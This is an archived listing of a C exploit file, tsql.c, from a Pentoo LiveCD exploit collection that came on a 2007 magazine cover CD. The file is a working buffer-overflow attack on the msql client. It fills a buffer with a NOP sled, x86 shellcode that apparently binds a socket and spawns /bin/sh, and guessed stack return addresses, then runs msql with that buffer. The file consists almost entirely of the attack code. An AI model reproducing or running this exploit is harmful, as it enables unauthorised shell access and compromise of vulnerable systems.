Chip 2007 January, February, March & April

home *** CD-ROM | disk | FTP | other *** search

/ Chip 2007 January, February, March & April / Chip-Cover-CD-2007-02.iso / Pakiet bezpieczenstwa / mini Pentoo LiveCD 2006.1 / mpentoo-2006.1.iso / livecd.squashfs / opt / pentoo / ExploitTree / application / database / mysql / tsql.c < prev next >

Wrap

C/C++ Source or Header | 2005-02-12 | 2KB | 55 lines

#include <unistd.h> #include <stdio.h> #include <stdlib.h> #include <fcntl.h> #define MSQL_PATH "/usr/local/bin/msql" #define BUFFER_SIZE 999 #define DEFAULT_OFFSET 0 #define NOP_SIZE 1 char nop[] = "\x90"; char shellcode[] = "\x31\xc0\xb0\x02\xcd\x80\x85\xc0\x75\x4c\xeb\x4c\x5e\xb0\x02\x89" "\x06\xfe\xc8\x89\x46\x04\xb0\x06\x89\x46\x08\xb0\x66\x31\xdb\xfe" "\xc3\x89\xf1\xcd\x80\x89\x06\xb0\x02\x66\x89\x46\x0c\xb0\x2a\x66" "\x89\x46\x0e\x8d\x46\x0c\x89\x46\x04\x31\xc0\x89\x46\x10\xb0\x10" "\x89\x46\x08\xb0\x66\xfe\xc3\xcd\x80\xb0\x01\x89\x46\x04\xb0\x66" "\xb3\x04\xcd\x80\xeb\x04\xeb\x48\xeb\x4e\x31\xc0\x89\x46\x04\x89" "\x46\x08\xb0\x66\xfe\xc3\xcd\x80\x88\xc3\xb0\x3f\x31\xc9\xcd\x80" "\xb0\x3f\xfe\xc1\xcd\x80\xb0\x3f\xfe\xc1\xcd\x80\xc7\x06\x2f\x62" "\x69\x6e\xc7\x46\x04\x2f\x73\x68\x21\x31\xc0\x88\x46\x07\x89\x76" "\x08\x89\x46\x0c\xb0\x0b\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80" "\x31\xc0\xb0\x01\x31\xdb\xcd\x80\xe8\x5f\xff\xff\xff"; unsigned long get_sp(void) { __asm__("movl %esp,%eax"); } void main(int argc,char **argv) { char *buff = NULL; unsigned long *addr_ptr = NULL; char *ptr = NULL; int i,off = DEFAULT_OFFSET; buff = malloc(2048); ptr = buff; for (i = 0; i <= BUFFER_SIZE ;i+=NOP_SIZE) { memcpy (ptr,nop,NOP_SIZE); ptr+=NOP_SIZE; } for(i=0;i < strlen(shellcode);i++) *(ptr++) = shellcode[i]; addr_ptr = (long *)ptr; for(i=0;i < (8/4);i++) *(addr_ptr++) = get_sp()+off; ptr = (char *)addr_ptr; *ptr = 0; printf("Using address: 0x%x\n", get_sp); execl(MSQL_PATH, "msql",buff, NULL); }